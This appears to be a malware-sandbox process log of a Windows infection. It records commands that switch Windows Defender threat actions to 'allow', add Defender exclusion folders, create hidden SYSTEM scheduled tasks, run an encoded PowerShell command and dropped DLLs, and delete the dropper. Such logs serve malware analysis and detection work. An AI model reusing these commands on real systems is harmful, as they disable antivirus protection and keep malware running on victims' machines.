Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵PID:5448
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:8440
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:7348
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:6760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:8280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:8560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:6568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:8820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:6264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:9156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:8664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:7212
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NMbcPgNClKinC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NMbcPgNClKinC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\STjmdXhOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\STjmdXhOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YceypsUXabDXnCzNCPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YceypsUXabDXnCzNCPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZHcfdgyasGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZHcfdgyasGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gaSWcYIjjvwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gaSWcYIjjvwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QPFeEjmgnBUOfRVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QPFeEjmgnBUOfRVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:2196
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:323⤵PID:3996
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:324⤵PID:6624
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:643⤵PID:8304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:323⤵PID:4192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:643⤵PID:6692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:323⤵PID:6780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:643⤵PID:8932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:323⤵PID:8848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:643⤵PID:4860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:323⤵PID:8944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:643⤵PID:6380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QPFeEjmgnBUOfRVB /t REG_DWORD /d 0 /reg:323⤵PID:8828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QPFeEjmgnBUOfRVB /t REG_DWORD /d 0 /reg:643⤵PID:8272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk /t REG_DWORD /d 0 /reg:323⤵PID:4648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk /t REG_DWORD /d 0 /reg:643⤵PID:8120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nyFjvKGtfVGLAKAU /t REG_DWORD /d 0 /reg:323⤵PID:7220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nyFjvKGtfVGLAKAU /t REG_DWORD /d 0 /reg:643⤵PID:7764
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmvOMIPVW" /SC once /ST 02:10:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:6240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmvOMIPVW"2⤵PID:7348
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmvOMIPVW"2⤵PID:7820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xsEpqqHAgqAwsAroz" /SC once /ST 03:47:04 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\tWwhhmv.exe\" za /site_id 668658 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "xsEpqqHAgqAwsAroz"2⤵PID:6480
-
-
C:\Users\Admin\AppData\Roaming\wjfatugC:\Users\Admin\AppData\Roaming\wjfatug1⤵PID:9048
-
C:\Users\Admin\AppData\Roaming\sgfatugC:\Users\Admin\AppData\Roaming\sgfatug1⤵PID:4992
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8300 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:8388
-
-
C:\Users\Admin\AppData\Local\Temp\A42F.exeC:\Users\Admin\AppData\Local\Temp\A42F.exe1⤵PID:7864
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\A42F.exe"2⤵PID:8768
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:8468
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:5896
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:3968
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:3816
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6940
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6260
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8892
-
C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\tWwhhmv.exeC:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\tWwhhmv.exe za /site_id 668658 /S1⤵PID:4192
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:1700
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:8228
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:7820
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:9264
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:9832
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bRciptYQhTCMvEFWGJ"2⤵PID:9484
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:9616
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:9816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:9880
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:10068
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\STjmdXhOU\PeXfRr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ArGDBXWmyYtLacf" /V1 /F2⤵
- Creates scheduled task(s)
PID:10128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ArGDBXWmyYtLacf2" /F /xml "C:\Program Files (x86)\STjmdXhOU\iqhxhmf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:9904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ArGDBXWmyYtLacf"2⤵PID:4472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ArGDBXWmyYtLacf"2⤵PID:1604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dqMFPCMVHmhnSY" /F /xml "C:\Program Files (x86)\gaSWcYIjjvwU2\nRhxySF.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4420
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sOuBCsGGBJoge2" /F /xml "C:\ProgramData\QPFeEjmgnBUOfRVB\rtNHuSJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:9404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdlTlvZfIMOZAvCeb2" /F /xml "C:\Program Files (x86)\YceypsUXabDXnCzNCPR\HhuuCAj.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:6196
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PcFGIyIlUJyYablHCHc2" /F /xml "C:\Program Files (x86)\NMbcPgNClKinC\VANzzHh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:9672
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nMmJzTJTMvgDqJXEl" /SC once /ST 03:53:22 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\zwjTlmrA\GcgVJLc.dll\",#1 /site_id 668658" /V1 /F2⤵
- Creates scheduled task(s)
PID:9748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "nMmJzTJTMvgDqJXEl"2⤵PID:2728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuIGIeyqnGn" /SC once /ST 02:52:00 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\ktbVNzSQ\SJLKiqz.exe\" 3L /S"2⤵
- Creates scheduled task(s)
PID:7556
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8340
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9536
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9916
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update1⤵PID:9620
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9292
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\nyFjvKGtfVGLAKAU\zwjTlmrA\GcgVJLc.dll",#1 /site_id 6686581⤵PID:1140
-
